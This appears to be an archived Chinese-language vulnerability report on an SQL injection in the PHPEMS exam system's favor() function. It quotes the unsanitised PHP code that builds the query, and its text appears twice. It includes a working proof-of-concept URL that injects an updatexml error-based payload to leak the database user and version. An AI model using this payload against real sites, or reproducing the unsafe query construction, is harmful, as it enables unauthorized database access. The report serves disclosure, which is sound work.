VULHUB ™

### 简要描述： PHPEMS一处SQL注入漏洞 ### 详细说明： 5.phpems某处SQL注入漏洞 存在注入漏洞代码位于/app/exam/app.php的函数favor()中 具体在 default: $page = $this->ev->get('page'); $type = $this->ev->get('type'); $search = $this->ev->get('search'); $tmp = $this->section->getKnowsListByArgs(array("knowssectionid = '{$search['sectionid']}'","knowsstatus = 1")); if($search['sectionid'] && !$search['knowsid']) { $search['knowsid'] = ''; if(is_array($tmp)) { foreach($tmp as $p) $search['knowsid'] .= $p['knowsid'].","; } } $search['knowsid'] = trim($search['knowsid']," ,"); $page = $page > 0?$page:1; $args = array("favorsubjectid = '{$this->data['currentbasic']['basicsubjectid']}'","favoruserid = '{$this->_user['sessionuserid']}'"); if($search['knowsid'])$args[] = "quest2knows.qkknowsid IN ({$search['knowsid']})";// SQL注入漏洞 if($type) { if($search['questype'])$args[] = "questionrows.qrtype = '{$search['questype']}'"; $favors = $this->favor->getFavorListByUserid($page,20,$args,1); } 这几行上 if($search['knowsid'])$args[] =...

### 简要描述： PHPEMS一处SQL注入漏洞 ### 详细说明： 5.phpems某处SQL注入漏洞 存在注入漏洞代码位于/app/exam/app.php的函数favor()中 具体在 default: $page = $this->ev->get('page'); $type = $this->ev->get('type'); $search = $this->ev->get('search'); $tmp = $this->section->getKnowsListByArgs(array("knowssectionid = '{$search['sectionid']}'","knowsstatus = 1")); if($search['sectionid'] && !$search['knowsid']) { $search['knowsid'] = ''; if(is_array($tmp)) { foreach($tmp as $p) $search['knowsid'] .= $p['knowsid'].","; } } $search['knowsid'] = trim($search['knowsid']," ,"); $page = $page > 0?$page:1; $args = array("favorsubjectid = '{$this->data['currentbasic']['basicsubjectid']}'","favoruserid = '{$this->_user['sessionuserid']}'"); if($search['knowsid'])$args[] = "quest2knows.qkknowsid IN ({$search['knowsid']})";// SQL注入漏洞 if($type) { if($search['questype'])$args[] = "questionrows.qrtype = '{$search['questype']}'"; $favors = $this->favor->getFavorListByUserid($page,20,$args,1); } 这几行上 if($search['knowsid'])$args[] = "quest2knows.qkknowsid IN ({$search['knowsid']})"; 这里的$search['knowsid']可以由URL参数中进行控制$search = $this->ev->get('search');带入组合SQL语句的时候并没有过滤，导致的SQL注入发生 验证 注册用户，登录之 然后访问链接 localhost/ems/index.php?exam-app-favor&search[knowsid]=1,updatexml(1,concat(user(),version()),1) [<img src="https://images.seebug.org/upload/201503/1218405216f2728b475200dd6170f48a0ef76d82.png" alt="aaa.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201503/1218405216f2728b475200dd6170f48a0ef76d82.png) 验证无误 ### 漏洞证明： 注册用户，登录之 然后访问链接 localhost/ems/index.php?exam-app-favor&search[knowsid]=1,updatexml(1,concat(user(),version()),1) [<img src="https://images.seebug.org/upload/201503/1218405216f2728b475200dd6170f48a0ef76d82.png" alt="aaa.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201503/1218405216f2728b475200dd6170f48a0ef76d82.png) 验证无误